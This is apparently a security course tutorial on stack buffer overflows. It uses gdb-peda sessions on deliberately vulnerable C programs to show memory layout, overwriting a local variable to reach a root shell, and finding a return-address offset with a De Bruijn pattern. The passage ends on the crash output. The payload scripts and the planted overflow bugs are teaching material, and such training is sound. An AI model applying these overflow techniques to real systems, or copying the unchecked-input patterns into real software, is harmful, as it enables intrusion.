0x05. Buffer Exploitation

Resources

Tutorials

Buffers

A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.

In C, we can declare a buffer of bytes as a char array, as follows:

char local_buffer[32];

Which results in the following assembly code:

080483db <main>:
 80483db:	55                   	push   ebp
 80483dc:	89 e5                	mov    ebp,esp
 80483de:	83 ec 20             	sub    esp,0x20
 80483e1:	b8 00 00 00 00       	mov    eax,0x0
 80483e6:	c9                   	leave  
 80483e7:	c3                   	ret 

Notice that the buffer is allocated by subtracting its intended size from the current stack pointer (sub esp, 0x20). This only reserves space on the stack; the contents are left uninitialized (remember that on x86 the stack grows “downwards”, from higher addresses to lower ones).

A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canaries enabled (an additional 64-bit value is implicitly placed between the buffers and the return address; more on that in future sessions), declaring either char s[32] or char s[40] might yield sub rsp, 0x30, because the allocation is rounded up to a 16-byte boundary.
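The arithmetic behind that example can be sketched in a few lines of Python. This is only a model: the 8-byte canary slot and the 16-byte rounding are assumptions taken from the paragraph above, and frame_size is a hypothetical helper, not something a compiler exposes. Real compilers may reserve additional space for other reasons.

```python
CANARY_SIZE = 8    # assumption: one 64-bit canary slot
ALIGNMENT = 16     # assumption: allocation is rounded up to 16 bytes


def frame_size(buffer_size, canary=CANARY_SIZE, alignment=ALIGNMENT):
    """Round buffer + canary up to the next multiple of `alignment`."""
    needed = buffer_size + canary
    return (needed + alignment - 1) // alignment * alignment


for size in (32, 40):
    # Both sizes end up needing the same 0x30 bytes in this model
    print("char s[%d] -> sub rsp, %#x" % (size, frame_size(size)))
```

Under these assumptions both declarations land on 0x30, which is why the source code alone does not tell you the real distance between a buffer and the return address.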

To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.

Buffers can also be stored in other places in memory, such as the heap, .bss or .rodata.

You can find the following code snippet here (buffers/buffers.c).

buffers.c
#include <stdio.h>
#include <stdlib.h>
 
char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";
 
int main(void)
{
	char l_buf[32];
	static char s_l_buf[32];
	char *heap_buf = malloc(32);
 
	free(heap_buf);
 
	return 0;
}

Let's have a look at the executable sections:

$ readelf -S buffers
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
...
  [16] .rodata           PROGBITS        080485a0 0005a0 000040 00   A  0   0 32
...
  [24] .data             PROGBITS        0804a020 001020 000040 00  WA  0   0 32
  [25] .bss              NOBITS          0804a060 001060 000060 00  WA  0   0 32
...
Key to Flags:
  W (write)
  A (alloc)

And the address of each symbol (buffer in this case):

080485c0 R g_buf_const
0804a040 D g_buf_init_vals
0804a080 B g_buf_init_zero
0804a0a0 b s_l_buf.2387
 
Key to Flags:
  R (symbol is read-only)
  D (symbol in initialized data section)
  B (symbol in BSS data section)
 
  Uppercase and lowercase flags refer to the same section.
  A lowercase flag means the symbol is local (not visible outside the module)

Alternatively, you can use gdb to extract information on each symbol:

gdb-peda$ p &g_buf_const
$1 = (<data variable, no debug info> *) 0x80485c0 <g_buf_const>

Using this information you can map each symbol to a data section. For example, the address of g_buf_const is 0x80485c0, which falls inside the .rodata section (addr=0x080485a0, size=0x40, so it covers 0x080485a0 through 0x080485df).
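The same lookup can be done for every symbol at once. The sketch below hardcodes the section ranges and symbol addresses from the listings in this section; section_of is a hypothetical helper name, and the values will differ for any other build of buffers.c.

```python
# (name, start address, size) copied from the readelf -S listing
SECTIONS = [
    (".rodata", 0x080485a0, 0x40),
    (".data",   0x0804a020, 0x40),
    (".bss",    0x0804a060, 0x60),
]

# Symbol addresses copied from the symbol listing
SYMBOLS = {
    "g_buf_const":     0x080485c0,
    "g_buf_init_vals": 0x0804a040,
    "g_buf_init_zero": 0x0804a080,
    "s_l_buf":         0x0804a0a0,
}


def section_of(addr):
    """Return the name of the section whose address range contains addr."""
    for name, start, size in SECTIONS:
        if start <= addr < start + size:
            return name
    return None


for symbol, addr in SYMBOLS.items():
    print("%-16s %#010x -> %s" % (symbol, addr, section_of(addr)))
```

Note that g_buf_init_zero ends up in .bss even though it has an explicit initializer, because that initializer is all zeros.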

Non-static local variables and dynamically allocated buffers cannot be seen in the executable: they have meaning only at runtime, because they are allocated on the stack or heap when the code reaches a certain point. Let's inspect the execution right before calling free() and see where the heap buffer is placed:

gdb-peda$ 
[----------------------------------registers-----------------------------------]
EAX: 0x804b160 --> 0x0 
EBX: 0x0 
ECX: 0x21e79 
EDX: 0x804b160 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd798 --> 0x0 
ESP: 0xffffd750 --> 0x804b160 --> 0x0 
EIP: 0x80484e8 (<main+50>:	call   0x8048350 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484df <main+41>:	mov    DWORD PTR [ebp-0x30],eax
   0x80484e2 <main+44>:	sub    esp,0xc
   0x80484e5 <main+47>:	push   DWORD PTR [ebp-0x30]
=> 0x80484e8 <main+50>:	call   0x8048350 <free@plt>
   0x80484ed <main+55>:	add    esp,0x10
   0x80484f0 <main+58>:	mov    eax,0x0
   0x80484f5 <main+63>:	mov    edx,DWORD PTR [ebp-0xc]
   0x80484f8 <main+66>:	xor    edx,DWORD PTR gs:0x14
Guessed arguments:
arg[0]: 0x804b160 --> 0x0 
[------------------------------------stack-------------------------------------]
0000| 0xffffd750 --> 0x804b160 --> 0x0 
0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
0008| 0xffffd758 --> 0xf7e0f049 (add    ebx,0x1a4fb7)
0012| 0xffffd75c --> 0xf7fb7748 --> 0x0 
0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c 
0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c 
0024| 0xffffd768 --> 0x804b160 --> 0x0 
0028| 0xffffd76c --> 0xf7e0f1ab (add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
gdb-peda$ x/wx $ebp-0x30
0xffffd768:	0x0804b160
gdb-peda$ vmm
Start      End        Perm	Name
...
0x0804b000 0x0806d000 rw-p	[heap]
...

The gdb-peda vmm command displays the virtual memory map of the process; this can be used to easily inspect the addresses and permissions of each memory region.

You can find the following code snippet here (init_buffer/init_buffer.c).

Let's fill our stack buffer with some values and disassemble the binary:

init_buffer.c
char local_buffer[32];
unsigned int i = 0;
 
for (i = 0; i < 32; i++) {
    local_buffer[i] = i;
}

080483db <main>:
 80483db:       55                      push   ebp
 80483dc:       89 e5                   mov    ebp,esp
 80483de:       83 ec 24                sub    esp,0x24                      ; reserve space for both the local_buffer (0x20) and i (0x4)
 80483e1:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; initialize i
 80483e8:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; redundant unoptimized compiler logic
 80483ef:       eb 13                   jmp    8048404 <main+0x29>           ; goto the end of loop
 80483f1:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get value of 'i' in eax
 80483f4:       89 c1                   mov    ecx,eax                       ; save 'i' in ecx
 80483f6:       8d 55 dc                lea    edx,[ebp-0x24]                ; load the address of 'local_buffer' in edx
 80483f9:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get 'i'
 80483fc:       01 d0                   add    eax,edx                       ; compute address of 'local_buffer+i' in eax
 80483fe:       88 08                   mov    BYTE PTR [eax],cl             ; store 'i' at *(local_buffer+i)
 8048400:       83 45 fc 01             add    DWORD PTR [ebp-0x4],0x1       ; increment 'i'
 8048404:       83 7d fc 1f             cmp    DWORD PTR [ebp-0x4],0x1f      ; 'i==31'?
 8048408:       76 e7                   jbe    80483f1 <main+0x16>           ; continue loop if below or equal or fall through if above
 804840a:       b8 00 00 00 00          mov    eax,0x0
 804840f:       c9                      leave  
 8048410:       c3                      ret

Notice that now we subtract 0x24 from the stack pointer, since this time we also need to reserve space for the unsigned integer used as an index.

Similar to how arguments are referenced using ebp, so are the local variables. Since in most cases the value of ebp stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.
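The name-to-offset mapping can be written down explicitly. This is a minimal sketch: the offsets are the ones read from the disassembly of init_buffer.c, the ebp value is a made-up example, and address_of is a hypothetical helper. Elements are assumed to be one byte wide, which holds for a char buffer.

```python
# Offsets relative to ebp, read from the disassembly of init_buffer.c
FRAME = {
    "i": -0x4,
    "local_buffer": -0x24,
}


def address_of(ebp, name, index=0):
    """Address of name[index] (1-byte elements) in a frame based at ebp."""
    return ebp + FRAME[name] + index


ebp = 0xffffd658  # hypothetical frame pointer value, for illustration only

print(hex(address_of(ebp, "local_buffer")))       # first byte of the buffer
print(hex(address_of(ebp, "local_buffer", 31)))   # last byte of the buffer
print(hex(address_of(ebp, "i")))                  # the loop counter
```

With this layout the last byte of local_buffer sits directly below i, so the two objects are adjacent in memory with nothing separating them.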

Values at offsets relative to ebp have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.

Finally, let's add one more interesting change to our code:

char local_buffer2[30];
char local_buffer[2];
unsigned int i = 0;
 
for (i = 0; i < 32; i++) {
    local_buffer[i] = i;
}

Can you guess what the resulting code will look like when disassembled? Where are we writing to?

Stack buffer overflows

As we have seen in previous sessions, the stack serves multiple purposes:

  • Passing function arguments from the caller to the callee
  • Storing local variables for functions
  • Temporarily saving register values before a call
  • Saving the return address and old frame pointer

Our previous example clearly showcases the fact that even though in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. This is the reason why in some higher level languages it is not possible to write beyond the bounds of containers - the size is integrated into the object itself.
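For contrast, here is how a container that carries its own size behaves. The sketch uses Python's built-in bytearray; checked_write is a hypothetical helper that only exists to make the outcome visible.

```python
def checked_write(buf, index, value):
    """Try buf[index] = value and report whether the container accepted it."""
    try:
        buf[index] = value
        return True
    except IndexError:
        # The object knows its own length and refuses the write
        return False


buf = bytearray(32)

print(checked_write(buf, 31, 0x41))   # last valid element
print(checked_write(buf, 32, 0x41))   # one element past the end
print(len(buf))                       # the size is unchanged
```

The out-of-bounds write is rejected at runtime instead of silently landing in whatever happens to be stored next to the buffer.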

But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using safe functions. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.

What can happen in the event that we write outside the bounds of a stack buffer?

You can find the following code snippet here (buffer_overflow/buffer_overflow.c).

buffer_overflow.c
void f(char *buf)
{
    unsigned int i = 0;
 
    for (i = 0; i < 100; i++) {
        buf[i] = i;
    }
}
 
int main(int argc, char* argv[])
{
    char local_buffer[32];
    f(local_buffer);
 
    return 0;
}

$ ./buffer_overflow
Segmentation fault (core dumped)

What happened? Let's try to find the cause starting with the call of f:

gdb-peda$ b *0x08048430
Breakpoint 1 at 0x8048430
 
gdb-peda$ r
[----------------------------------registers-----------------------------------]
EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0xffffd684 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd658 --> 0x0 
ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EIP: 0x8048430 (<main+10>:	call   0x80483f6 <f>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048429 <main+3>:	sub    esp,0x20
   0x804842c <main+6>:	lea    eax,[ebp-0x20]
   0x804842f <main+9>:	push   eax
=> 0x8048430 <main+10>:	call   0x80483f6 <f>
   0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
   0x804843e <main+24>:	ret
Guessed arguments:
arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>:	lea    eax,[ebx-0xf4])
0012| 0xffffd640 --> 0xf7fe59b0 (push   ebp)
0016| 0xffffd644 --> 0x0 
0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>:	add    ebx,0x1bb7)
0024| 0xffffd64c --> 0x0 
0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 1, 0x08048430 in main ()
 
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd69b --> 0x63 ('c')
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100 
EIP: 0x8048435 (<main+15>:	add    esp,0x4)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804842c <main+6>:	lea    eax,[ebp-0x20]
   0x804842f <main+9>:	push   eax
   0x8048430 <main+10>:	call   0x80483f6 <f>
=> 0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
   0x804843e <main+24>:	ret    
   0x804843f:	nop
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0x3020100 
0004| 0xffffd638 --> 0x3020100 
0008| 0xffffd63c --> 0x7060504 
0012| 0xffffd640 --> 0xb0a0908 
0016| 0xffffd644 --> 0xf0e0d0c 
0020| 0xffffd648 --> 0x13121110 
0024| 0xffffd64c --> 0x17161514 
0028| 0xffffd650 --> 0x1b1a1918 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048435 in main ()
 
gdb-peda$ b *0x0804843e
Breakpoint 2 at 0x0804843e
 
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x23222120 (' !"#')
ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x804843e (<main+24>:	ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
=> 0x804843e <main+24>:	ret    
   0x804843f:	nop
   0x8048440 <__libc_csu_init>:	push   ebp
   0x8048441 <__libc_csu_init+1>:	push   edi
   0x8048442 <__libc_csu_init+2>:	push   esi
[------------------------------------stack-------------------------------------]
0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 2, 0x0804843e in main ()
 
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x23222120 (' !"#')
ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x27262524 ("$%&'")
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x27262524
[------------------------------------stack-------------------------------------]
0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x27262524 in ?? ()

It seems that the return address of main, along with a lot more of the stack, gets overwritten with the bytes that we write “in the buffer”. The program then tries to “return to $%&'” ($%&' is the ASCII representation of 0x27262524 as stored in little endian), which is an unmapped address. This triggers a page fault, upon which the operating system delivers SIGSEGV and terminates the process.
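The crash address can be decoded mechanically. The sketch below (Python 3) relies on one property of this particular example: f() stores the value i at buf[i], so each byte that ends up in EIP is also its own offset from the start of the buffer.

```python
import struct

eip = 0x27262524                  # EIP value reported by gdb at the crash

# Pack as a little-endian 32-bit value to recover the bytes as laid out in memory
raw = struct.pack("<I", eip)
print(raw)                        # b"$%&'"

# Because buf[i] == i in this program, the first byte is the offset of the
# saved return address relative to the start of local_buffer
offset = raw[0]
print(offset)                     # 36

# Cross-check against the disassembly: buffer at ebp-0x20, then 4 bytes of saved ebp
print(0x20 + 4)                   # 36
```

Both computations agree on 36, which matches the frame layout seen in main (lea eax,[ebp-0x20]).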

A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely nothing.

Diverting code execution

We attempted to use the wonderful gets function, but the compiler does not generate it and the man page explicitly says:

DESCRIPTION
       Never use this function.

       gets()  reads  a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
       null byte ('\0').  No check for buffer overrun is performed (see BUGS below).

However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.

You can find the following code snippet here (buffer_overflow_var/buffer_overflow_var.c).

buffer_overflow_var.c
#include <stdio.h>
#include <stdlib.h>
 
void f(char* buf) {
 
    fgets(buf, 100, stdin);
}
 
int main(int argc, char* argv[])
{
    int critical_variable = 0;
    char local_buffer[32];
    f(local_buffer);
 
    if (critical_variable == 1337) {
        printf("Oh dear, you shouldn't be here!\n");
        system("/bin/sh");
    }
 
    return 0;
}

Our local_buffer is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.

$ python -c "print('A'*32 + '1337')" | ./buffer_overflow_var

Nothing happened. Let's find out why. We'll save our payload to a file and run buffer_overflow_var under gdb, using the file as input:

$ python -c "print('A'*32 + '1337')" > payload
$ gdb ./buffer_overflow_var
gdb-peda$ b *0x80484fc
Breakpoint 1 at 0x80484fc
 
gdb-peda$ r < payload
Starting program: ./buffer_overflow_var < payload
 
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
EBX: 0x0 
ECX: 0xf7fb589c --> 0x0 
EDX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd608 --> 0x0 
ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
EIP: 0x80484fc (<main+39>:	cmp    DWORD PTR [ebp-0xc],0x539)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484f3 <main+30>:	push   eax
   0x80484f4 <main+31>:	call   0x80484b6 <f>
   0x80484f9 <main+36>:	add    esp,0x10
=> 0x80484fc <main+39>:	cmp    DWORD PTR [ebp-0xc],0x539
   0x8048503 <main+46>:	jne    0x8048525 <main+80>
   0x8048505 <main+48>:	sub    esp,0xc
   0x8048508 <main+51>:	push   0x80485c0
   0x804850d <main+56>:	call   0x8048360 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c 
0008| 0xffffd5d8 --> 0x0 
0012| 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
0016| 0xffffd5e0 ('A' <repeats 28 times>, "1337\n")
0020| 0xffffd5e4 ('A' <repeats 24 times>, "1337\n")
0024| 0xffffd5e8 ('A' <repeats 20 times>, "1337\n")
0028| 0xffffd5ec ('A' <repeats 16 times>, "1337\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 1, 0x080484fc in main ()
 
gdb-peda$ x/wx $ebp-0xc
0xffffd5fc:	0x37333331
gdb-peda$ x/s $ebp-0xc
0xffffd5fc:	"1337\n"

We usually use high-level scripting languages, such as Python, to craft payloads. For example, to generate 32 As, we just use 'A'*32.

We can observe two things:

  • We actually wrote the string 1337, which is 0x37333331, instead of the actual value 1337 or 0x539 in hex.
  • We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.

An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:

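#!/usr/bin/env python
import struct

buflen = 32

# 32 bytes fill local_buffer; the next 4 bytes land in critical_variable
payload = b'A' * buflen
payload += struct.pack('<I', 1337)  # little-endian 32-bit integer

# The payload is raw bytes, so open the file in binary mode
with open('payload', 'wb') as f:
    f.write(payload)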

Note the use of struct.pack and struct.unpack when working with binary data that needs to be stored in various configurations.
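To make the difference between the two payloads concrete, the following Python 3 sketch compares the text "1337" with the packed integer 1337. Only standard struct format strings are used; the variable names are illustrative.

```python
import struct

as_text = b"1337"                     # what the first payload contained
as_int = struct.pack("<I", 1337)      # what the comparison with 0x539 expects

# Interpreting the four ASCII bytes as a little-endian integer
print(hex(struct.unpack("<I", as_text)[0]))   # 0x37333331

# The integer 1337 (0x539), least significant byte first
print(as_int)                                 # b'9\x05\x00\x00'

# The same integer in big endian, for comparison
print(struct.pack(">I", 1337))                # b'\x00\x00\x059'
```

The byte 0x39 is printed as the character 9 because it happens to be printable ASCII; the payload still contains the raw byte values 39 05 00 00.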

Let's test our new payload:

$ cat payload | ./buffer_overflow_var 
Oh dear, you shouldn't be here!

It seems to alter the code flow as we wanted, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is the fact that the binary reads from stdin in one “chomp”. Our newly spawned shell has no input left to read, and exits before we get a chance to input any commands (similar to how the shell behaves when you press Ctrl-D, which signals end of input). We can use the following clever trick to keep stdin open for further user interaction:

$ cat payload - | ./buffer_overflow_var
Oh dear, you shouldn't be here!
date
Tue Jun 27 22:17:48 EEST 2017
whoami
root

We used the cat filename - | ./binary trick to concatenate the contents of filename with the standard input. Once the end of the file is reached, cat keeps reading from its own standard input, so you can continue feeding data to the binary.

Overwriting the stored return address

Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.

You can find the following code snippet here (buffer_overflow_ret/buffer_overflow_ret.c).

buffer_overflow_ret.c
#include <stdio.h>
 
void win()
{
    printf("Well done!\n");
}
 
void f()
{
    printf("Nothing to see here\n");
}
 
void get_message(char *buf)
{
    fgets(buf, 100, stdin);
}
 
int main(int argc, char* argv[])
{
    char local_buffer[32];
 
    printf("Please leave a message: ");
    get_message(local_buffer);
 
    f();
 
    return 0;
}

First, let's trigger the program to crash like in the previous example:

$ ./buffer_overflow_ret 
Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nothing to see here
Segmentation fault (core dumped)

However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.
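To see why such a pattern pins down an offset, here is a minimal Python 3 sketch of a generic de Bruijn pattern generator and the matching lookup. It is not PEDA's implementation and produces a different pattern than pattc; the function names and the lowercase alphabet are assumptions made for illustration.

```python
import struct
from itertools import islice


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence over alphabet for windows of length n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length, alphabet="abcdefghijklmnopqrstuvwxyz", n=4):
    """Return the first `length` characters of the sequence."""
    return "".join(islice(de_bruijn(alphabet, n), length))


def pattern_offset(pattern, crashed_eip):
    """Offset of the 4 pattern bytes that were loaded into EIP (little endian)."""
    window = struct.pack("<I", crashed_eip).decode("ascii")
    return pattern.find(window)


pattern = pattern_create(100)

# Simulate a crash where the 4 bytes at offset 40 became the return address
fake_eip = struct.unpack("<I", pattern[40:44].encode("ascii"))[0]
print(pattern_offset(pattern, fake_eip))
```

Because every 4-character window occurs only once, the value found in EIP after the crash identifies exactly one position in the input. The offset 40 in the simulated crash was chosen to mirror the value PEDA reports for this binary.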

$ gdb ./buffer_overflow_ret 
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: ./buffer_overflow_ret
Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
Nothing to see here
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x804b160 ("Nothing to see here\nge: ")
EDX: 0xf7fb5890 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x61414145 ('EAAa')
ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
EIP: 0x41304141 ('AA0A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41304141
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
